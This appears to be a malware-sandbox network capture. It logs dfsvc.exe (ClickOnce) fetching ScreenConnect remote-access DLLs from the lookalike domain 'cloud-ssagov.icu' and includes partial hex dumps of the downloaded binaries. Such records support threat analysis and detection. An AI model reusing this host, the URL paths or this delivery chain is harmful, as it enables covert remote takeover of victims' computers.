2024-11-13 17:18:19 UTC	16384	IN	Data Raw: 04 05 00 04 fe 06 63 0a 00 06 73 aa 07 00 0a 25 80 0b 05 00 04 28 99 01 00 2b 2d 05 1a 13 04 de 18 de 14 07 2c 06 07 6f 22 00 00 0a dc 06 2c 06 06 6f 22 00 00 0a dc 17 2a 11 04 2a 00 00 00 41 34 00 00 02 00 00 00 6d 00 00 00 1f 01 00 00 8c 01 00 00 0a 00 00 00 00 00 00 00 02 00 00 00 67 00 00 00 2f 01 00 00 96 01 00 00 0a 00 00 00 00 00 00 00 32 02 7b 01 05 00 04 6f ab 07 00 0a 2a 00 00 00 1b 30 05 00 e4 00 00 00 f1 00 00 11 73 89 0a 00 06 0a 06 02 7d 40 05 00 04 06 03 7d 3b 05 00 04 28 60 07 00 0a 28 ac 07 00 0a 73 59 0a 00 06 0b 06 07 6f 80 00 00 0a 73 5a 0a 00 06 7d 3c 05 00 04 06 06 7b 3b 05 00 04 6f ad 07 00 0a 0c 12 02 28 ae 07 00 0a 06 7b 3b 05 00 04 6f ad 07 00 0a 0c 12 02 28 af 07 00 0a 1f 20 17 28 b0 07 00 0a 7d 3d 05 00 04 06 06 7b 3b 05 00 04 Data Ascii: cs%(+-,o",o"*A4mg/2{o0s}@};(`(sYosZ}<{;o({;o( (}={;
2024-11-13 17:18:19 UTC	16384	IN	Data Raw: 80 01 02 00 04 20 8f 00 00 00 28 37 06 00 06 80 02 02 00 04 20 ff 00 00 00 28 37 06 00 06 80 03 02 00 04 16 28 37 06 00 06 80 04 02 00 04 20 96 00 00 00 28 37 06 00 06 80 06 02 00 04 1b 8d d3 02 00 01 25 d0 64 02 00 04 28 ba 04 00 0a 80 07 02 00 04 1f 11 8d d3 02 00 01 25 d0 65 02 00 04 28 ba 04 00 0a 80 08 02 00 04 22 00 00 80 3f 22 00 00 80 3f 22 00 00 80 3f 22 00 00 00 3f 28 38 05 00 06 80 09 02 00 04 22 33 33 33 3f 22 33 33 33 3f 22 33 33 33 3f 22 00 00 80 3f 28 38 05 00 06 80 0a 02 00 04 1e 28 34 05 00 06 80 0b 02 00 04 1a 28 34 05 00 06 73 ca 04 00 0a 80 0c 02 00 04 1f 18 1f 18 28 35 05 00 06 80 0d 02 00 04 1f 10 1f 10 28 35 05 00 06 80 0e 02 00 04 1f 18 1f 18 28 35 05 00 06 80 0f 02 00 04 1f 21 1f 10 28 35 05 00 06 80 10 02 00 04 1f 20 1f 10 28 35 Data Ascii: (7 (7(7 (7%d(%e("?"?"?"?(8"333?"333?"333?"?(8(4(4s(5(5(5!(5 (5
2024-11-13 17:18:19 UTC	16384	IN	Data Raw: 6f 98 09 00 0a 04 2c 07 06 04 6f 98 09 00 0a 25 28 01 02 00 0a 28 01 02 00 0a 28 77 01 00 0a 06 6f 99 09 00 0a 28 dc 04 00 0a 7d 18 06 00 04 fe 06 f1 0b 00 06 73 38 02 00 0a 14 28 39 02 00 0a 26 2a 00 13 30 05 00 89 00 00 00 3f 01 00 11 73 f6 0b 00 06 0a 06 0e 06 7d 1d 06 00 04 06 03 04 05 0e 04 73 79 03 00 06 7d 1e 06 00 04 02 28 9a 09 00 0a 0b 06 7b 1e 06 00 04 06 fe 06 f7 0b 00 06 73 9f 01 00 0a 6f a0 01 00 0a 0e 05 2c 1a 06 7b 1e 06 00 04 07 6f da 02 00 0a 26 06 7b 1e 06 00 04 6f d8 01 00 0a 2b 28 0e 07 2c 0d 0e 07 06 7b 1e 06 00 04 6f 9b 09 00 0a 06 7b 1e 06 00 04 07 6f 9c 09 00 0a 06 7b 1e 06 00 04 6f dc 02 00 0a 06 7b 1e 06 00 04 2a 62 03 04 05 0e 04 73 79 03 00 06 25 02 6f da 02 00 0a 26 6f 7c 03 00 06 2a 00 00 13 30 02 00 34 00 00 00 40 01 00 11 Data Ascii: o,o%(((wo(}s8(9&0?s}sy}({so,{o&{o+(,{o{o{o{bsy%o&o\|*04@
2024-11-13 17:18:19 UTC	16384	IN	Data Raw: 0d 0b 00 0a 2a 00 00 13 30 02 00 2f 00 00 00 87 01 00 11 02 03 28 08 0b 00 0a 0a 12 00 28 ea 02 00 0a 2c 0d 12 00 28 77 09 00 0a 73 e8 02 00 0a 2a 7e 49 01 00 04 03 6f 0e 0b 00 0a 28 0a 0b 00 0a 2a 36 03 02 28 0b 0b 00 0a 73 67 0c 00 06 2a 2e 73 fd 06 00 06 80 6b 02 00 04 2a 1e 02 28 46 00 00 0a 2a 1e 03 6f 0f 0b 00 0a 2a 2e 73 00 07 00 06 80 6d 02 00 04 2a 1e 02 28 46 00 00 0a 2a 42 03 28 c7 08 00 0a 2c 07 03 17 28 10 0b 00 0a 2a 66 03 28 c7 08 00 0a 2c 10 03 28 11 0b 00 0a 8e 2d 07 03 16 28 10 0b 00 0a 2a 2e 73 04 07 00 06 80 70 02 00 04 2a 1e 02 28 46 00 00 0a 2a 2a 03 7b f4 00 00 0a 14 fe 03 2a 1e 02 28 46 00 00 0a 2a 62 03 6f 12 0b 00 0a 02 7c 72 02 00 04 7b 13 0b 00 0a 59 28 14 0b 00 0a 2a 1e 02 28 46 00 00 0a 2a 13 30 02 00 57 00 00 00 00 00 00 00 Data Ascii: 0/((,(ws~Io(6(sg.sk(Fo.sm(FB(,(f(,(-(.sp(F*{(Fbo\|r{Y((F*0W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49762	185.49.126.73	443	6996	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:18:20 UTC	93	OUT	GET /Bin/ScreenConnect.Client.dll HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip
2024-11-13 17:18:20 UTC	235	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 197120 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:18:20 GMT Connection: close
2024-11-13 17:18:20 UTC	16149	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e7 02 f1 94 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 96 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 23 92 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL" 0 `#@
2024-11-13 17:18:20 UTC	16384	IN	Data Raw: 00 00 11 73 75 00 00 0a 0a 06 72 8f 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 f8 02 00 06 16 fe 01 2a 26 0f 00 03 28 fb 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fb 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c3 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 fd 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ff 02 00 06 16 fe 01 2a 26 0f 00 03 28 02 03 00 06 2a 0a 16 2a 5e 03 75 78 00 00 02 2c 0d 02 03 a5 78 00 00 02 28 02 03 00 06 2a 16 2a 0a 17 2a 00 Data Ascii: surpov&rYpov&(, ow&}ow&o)*.(&(^uw,w(0@surpov&rYpov&(, ow&}ow&o).(&(^ux,x(*
2024-11-13 17:18:20 UTC	16384	IN	Data Raw: 15 04 00 06 72 b7 17 00 70 18 28 2e 02 00 0a 26 02 28 da 00 00 0a 7d 05 01 00 04 02 7e 2c 02 00 0a 7d 06 01 00 04 02 15 7d 07 01 00 04 02 28 ef 00 00 0a 6f 2f 02 00 0a 7d 04 01 00 04 02 7b 04 01 00 04 03 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 6f 32 02 00 0a 02 7b 04 01 00 04 05 0e 04 6f 33 02 00 0a 02 7b 04 01 00 04 16 16 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 73 95 01 00 0a 06 fe 06 b5 04 00 06 73 34 02 00 0a 28 35 02 00 0a de 10 26 02 28 14 04 00 06 fe 1a 07 28 bd 00 00 0a dc 2a 00 00 00 01 1c 00 00 00 00 66 00 76 dc 00 09 16 00 00 01 02 00 1a 00 cb e5 00 07 00 00 00 00 1b 30 03 00 42 00 00 00 25 00 00 11 02 7b 03 01 00 04 0a 06 28 b8 00 00 0a 02 28 15 04 00 06 72 cb 17 00 70 18 28 36 02 00 0a 26 02 Data Ascii: rp(.&(}~,}}(o/}{{ko0{ko1o2{o3{{ko0{ko1ss4(5&((*fv0B%{((rp(6&
2024-11-13 17:18:20 UTC	16384	IN	Data Raw: 00 38 56 4a 1f 16 00 6a 38 4e 1f 16 00 76 38 4e 1f 36 00 56 0a 58 1f 16 00 e1 01 5d 1f 16 00 f6 03 6e 1f 16 00 30 07 7f 1f 16 00 ab 08 5d 1f 16 00 30 04 87 1f 16 00 4d 07 91 1f 16 00 01 00 9b 1f 16 00 3b 03 9b 1f 06 00 ce 72 a4 1f 06 00 69 5c b3 1d 06 00 ce 72 a4 1f 06 00 a5 75 a4 1d 01 00 e3 74 a9 1f 01 00 e5 59 bf 10 01 00 50 37 af 1f 36 00 56 0a b4 1f 16 00 8a 02 b9 1f 36 00 56 0a c5 1f 16 00 a0 00 b9 1f 36 00 56 0a fc 11 16 00 70 00 f2 11 16 00 94 03 68 12 06 00 12 81 64 07 06 00 06 63 ca 11 06 00 7b 6d 25 11 06 00 ce 72 cf 11 06 00 71 32 dc 11 06 00 9c 79 e1 11 06 00 90 83 bc 10 06 00 a9 62 42 13 06 00 ce 72 cf 11 06 00 19 0d 58 04 06 00 26 77 ca 1f 06 00 ce 72 cf 1f 06 00 ac 65 90 1e 06 00 7d 5d e1 11 36 00 56 0a d4 1f 16 00 6c 01 d9 1f 06 00 ce 72 Data Ascii: 8VJj8Nv8N6VX]n0]0M;ri\rutYP76V6V6Vphdc{m%rq2ybBrX&wre}]6Vlr
2024-11-13 17:18:20 UTC	16384	IN	Data Raw: 00 00 00 c6 05 dc 6e b8 21 e8 03 00 00 00 00 00 00 c6 05 11 0c b1 04 e8 03 74 b2 00 00 00 00 c4 01 1e 2a db 2b e8 03 94 b2 00 00 00 00 94 00 7b 3e e5 2b e9 03 00 00 00 00 00 00 c4 05 42 64 ef 2b ea 03 37 b3 00 00 00 00 81 00 bc 71 ef 2b eb 03 58 b3 00 00 00 00 c4 00 58 10 e7 21 ec 03 a8 b9 00 00 00 00 81 00 81 2a f6 2b ed 03 10 ba 00 00 00 00 91 00 00 0f 05 2c f0 03 a8 ba 00 00 00 00 81 00 6a 09 15 2c f4 03 c8 ba 00 00 00 00 91 18 97 66 c0 20 f5 03 d4 ba 00 00 00 00 86 18 91 66 01 00 f5 03 dc ba 00 00 00 00 83 00 87 01 1c 2c f5 03 fb ba 00 00 00 00 91 18 97 66 c0 20 f6 03 07 bb 00 00 00 00 86 18 91 66 01 00 f6 03 0f bb 00 00 00 00 83 00 3a 00 2d 2c f6 03 17 bb 00 00 00 00 83 00 74 03 34 2c f7 03 1f bb 00 00 00 00 83 00 a3 01 85 29 f8 03 32 bb 00 00 00 00 Data Ascii: n!t+{>+Bd+7q+XX!+,j,f f,f f:-,t4,)2
2024-11-13 17:18:20 UTC	16384	IN	Data Raw: 00 b6 1c 01 13 1a 00 e8 2e 01 13 6b 00 b6 1c 20 13 6b 00 b6 1c 21 13 6b 00 b6 1c 41 13 6b 00 b6 1c 60 13 6b 00 b6 1c 61 13 1a 00 e8 2e 61 13 6b 00 b6 1c 80 13 6b 00 b6 1c a3 13 6b 00 b6 1c c3 13 6b 00 b6 1c e1 13 6b 00 b6 1c e3 13 6b 00 b6 1c 01 14 6b 00 b6 1c 03 14 6b 00 b6 1c 21 14 6b 00 b6 1c 41 14 6b 00 b6 1c 60 14 6b 00 b6 1c 61 14 6b 00 b6 1c 63 14 6b 00 b6 1c 81 14 6b 00 b6 1c 83 14 6b 00 b6 1c a0 14 6b 00 b6 1c a1 14 6b 00 b6 1c c1 14 6b 00 b6 1c c3 14 6b 00 b6 1c e1 14 6b 00 b6 1c e3 14 6b 00 b6 1c 01 15 6b 00 b6 1c 03 15 6b 00 b6 1c 21 15 6b 00 b6 1c 23 15 6b 00 b6 1c 41 15 1a 00 69 2f 41 15 6b 00 b6 1c 44 15 c2 05 b6 1c 61 15 6b 00 b6 1c 63 15 6b 00 b6 1c 80 15 6b 00 b6 1c 81 15 6b 00 b6 1c 83 15 6b 00 b6 1c a0 15 6b 00 b6 1c a1 15 1a 00 e8 2e Data Ascii: .k k!kAk`ka.akkkkkkkk!kAk`kakckkkkkkkkkkk!k#kAi/AkDakckkkkk.
2024-11-13 17:18:20 UTC	16384	IN	Data Raw: 74 69 6d 65 72 49 44 00 67 65 74 5f 52 65 71 75 65 73 74 49 44 00 73 65 74 5f 52 65 71 75 65 73 74 49 44 00 3c 3e 4f 00 53 79 73 74 65 6d 2e 49 4f 00 3c 73 74 72 65 61 6d 49 44 3e 50 00 43 61 6c 63 75 6c 61 74 65 46 50 53 00 54 00 67 65 74 5f 58 00 74 69 6c 65 58 00 67 65 74 5f 59 00 74 69 6c 65 59 00 76 61 6c 75 65 5f 5f 00 55 6e 69 6f 6e 55 6e 6c 65 73 73 4e 6f 41 72 65 61 00 67 65 74 5f 44 61 74 61 00 73 65 74 5f 44 61 74 61 00 73 6f 75 6e 64 44 61 74 61 00 57 72 69 74 65 4d 65 73 73 61 67 65 44 61 74 61 00 67 65 74 5f 46 72 61 6d 65 44 61 74 61 00 73 65 74 5f 46 72 61 6d 65 44 61 74 61 00 53 69 67 6e 44 61 74 61 00 67 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 73 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 Data Ascii: timerIDget_RequestIDset_RequestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWriteMessageDataget_FrameDataset_FrameDataSignDataget_AuthenticationDataset_AuthenticationData
2024-11-13 17:18:20 UTC	16384	IN	Data Raw: 50 72 6f 70 65 72 74 69 65 73 2e 53 74 61 74 75 73 47 6c 79 70 68 42 6c 61 6e 6b 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 43 6c 69 70 62 6f 61 72 64 4b 65 79 73 74 72 6f 6b 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 46 69 6c 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 Data Ascii: Properties.StatusGlyphBlankMonitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Properties.CommandSendClipboardKeystrokes.pngScreenConnect.Properties.CommandSendFiles.pngScreenConnec
2024-11-13 17:18:20 UTC	16384	IN	Data Raw: 00 74 00 65 00 4d 00 69 00 63 00 72 00 6f 00 70 00 68 00 6f 00 6e 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00 Data Ascii: teMicrophoneCommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolu
2024-11-13 17:18:20 UTC	16384	IN	Data Raw: 0a 01 00 02 00 00 00 00 01 00 00 6d 01 00 05 00 00 00 10 57 61 69 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 15 53 74 61 72 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 Data Ascii: mWaitMillisecondsStartMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMulti

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49763	185.49.126.73	443	6996	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:18:21 UTC	124	OUT	GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip Connection: Keep-Alive
2024-11-13 17:18:22 UTC	234	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 68096 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:18:21 GMT Connection: close
2024-11-13 17:18:22 UTC	16150	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e 75 1d df 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 70 0e 01 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELnu" 0 @ p@
2024-11-13 17:18:22 UTC	16384	IN	Data Raw: bb 00 00 0a 25 09 6f 23 02 00 0a 6f bc 00 00 0a 6f 94 00 00 0a 07 6f 11 00 00 0a 2d d0 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 7b 54 00 00 04 6f 24 02 00 0a 13 04 2b 5a 11 04 6f 25 02 00 0a 13 05 02 7b 53 00 00 04 7b 0d 00 00 04 11 05 73 26 02 00 0a 25 02 7b 52 00 00 04 28 f8 00 00 0a 7e 30 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 6d 00 00 06 73 06 02 00 0a 25 80 30 00 00 04 28 5f 00 00 2b 6f 27 02 00 0a 73 81 00 00 0a 6f 82 00 00 0a 11 04 6f 11 00 00 0a 2d 9d de 0c 11 04 2c 07 11 04 6f 10 00 00 0a dc 2a 01 1c 00 00 02 00 65 00 34 99 00 0a 00 00 00 00 02 00 b0 00 67 17 01 0c 00 00 00 00 1e 02 28 1d 00 00 0a 2a 56 02 7b 54 00 00 04 03 6f 23 02 00 0a 6f 28 02 00 0a 16 fe 01 2a 1e 02 28 1d 00 00 0a 2a 4a 02 7b 56 00 00 04 6f 29 02 00 0a 03 28 2a 02 00 0a 2a Data Ascii: %o#ooo-,o{To$+Zo%{S{s&%{R(~0%-&~+ms%0(_+o'soo-,oe4g(V{To#o((J{Vo)(**
2024-11-13 17:18:22 UTC	16384	IN	Data Raw: 74 00 d1 07 2e 3e 16 15 31 04 c0 25 1c 15 79 05 16 3e 27 15 19 04 ae 2d 2d 15 19 04 cd 2e 37 15 b1 04 3c 27 3e 15 31 04 cb 31 78 09 29 04 e0 42 f6 00 e9 04 fe 42 56 15 f4 00 9b 18 81 02 31 04 a5 32 5c 15 f4 03 71 3a a1 00 fc 03 71 3a a1 00 19 04 ca 2d 85 15 11 03 71 3a 6a 04 09 03 5e 30 9e 15 d9 07 e5 35 a7 15 09 03 42 2c ad 15 e1 07 6b 29 06 00 19 03 5d 31 20 02 31 04 83 2d bd 15 29 04 84 31 6a 04 19 03 80 25 20 02 29 04 ad 25 6a 04 19 03 99 1b 20 02 29 04 c6 1b 6a 04 e1 07 61 29 06 00 21 03 f7 2e 20 02 d1 00 ea 49 c5 15 29 04 04 2f 6a 04 a9 04 31 3d b2 11 8c 03 8d 08 5a 04 e9 04 b2 49 bd 0a 04 04 f8 3e 46 00 8c 03 52 0b 5e 04 e9 04 cd 42 d8 15 31 04 e2 34 e0 15 29 04 e0 46 14 01 d1 01 9a 42 ef 15 5c 02 de 2c 63 00 09 02 e1 2e 14 01 69 02 c8 41 00 16 69 Data Ascii: t.>1%y>'--.7<'>11x)BBV12\q:q:-q:j^05B,k)]1 1-)1j% )%j )ja)!. I)/j1=ZI>FR^B14)FB\,c.iAi
2024-11-13 17:18:22 UTC	16384	IN	Data Raw: 6e 74 69 61 6c 73 41 63 74 69 6f 6e 00 53 65 63 75 72 69 74 79 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 53 65 74 74 69 6e 67 73 50 72 6f 70 65 72 74 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 72 6f 75 70 43 6f 6c 6c 65 63 74 69 6f 6e 00 57 61 69 74 69 6e 67 46 6f 72 43 6f 6e 6e 65 63 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 43 72 79 70 74 6f 67 72 61 70 68 69 63 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 54 72 61 63 65 45 78 63 65 70 74 69 6f 6e 00 45 6e 64 4f 66 53 74 72 65 61 6d 45 78 63 65 70 74 69 6f 6e 00 52 75 6e 57 69 74 68 43 72 61 73 68 4f 6e 45 78 63 65 70 74 69 6f 6e 00 54 72 79 53 75 62 73 63 72 69 62 65 54 6f 4c 6f 67 41 70 70 Data Ascii: ntialsActionSecurityActionSystem.ReflectionSettingsPropertyValueCollectionGroupCollectionWaitingForConnectionWin32ExceptionCryptographicExceptionNotSupportedExceptionTraceExceptionEndOfStreamExceptionRunWithCrashOnExceptionTrySubscribeToLogApp
2024-11-13 17:18:22 UTC	2794	IN	Data Raw: 6e 43 6f 6e 6e 65 63 74 20 53 6f 66 74 77 61 72 65 00 00 08 01 00 00 08 00 00 00 00 05 01 00 01 00 00 05 01 00 02 00 00 0a 01 00 02 00 00 00 00 01 00 00 20 01 00 03 00 00 00 09 53 65 73 73 69 6f 6e 49 44 04 4e 61 6d 65 08 55 73 65 72 4e 61 6d 65 00 00 0d 01 00 05 00 00 00 00 00 00 00 01 00 00 2d 01 00 02 00 00 00 1c 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 49 6e 73 74 61 6e 63 65 49 44 07 4d 65 73 73 61 67 65 00 00 0b 01 00 03 00 00 00 00 01 01 00 00 33 01 00 03 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 00 00 52 01 00 05 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 Data Ascii: nConnect Software SessionIDNameUserName-CredentialProviderInstanceIDMessage3ExecutablePathCommandLineParentProcessIDRExecutablePathCommandLineParentProces

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49764	185.49.126.73	443	6996	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:18:23 UTC	115	OUT	GET /Bin/ScreenConnect.Core.dll HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip Connection: Keep-Alive
2024-11-13 17:18:23 UTC	235	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 548864 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:18:23 GMT Connection: close
2024-11-13 17:18:23 UTC	16149	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c b7 8b a9 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 58 08 00 00 06 00 00 00 00 00 00 b6 73 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 5d f6 08 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELl" 0Xs ]@
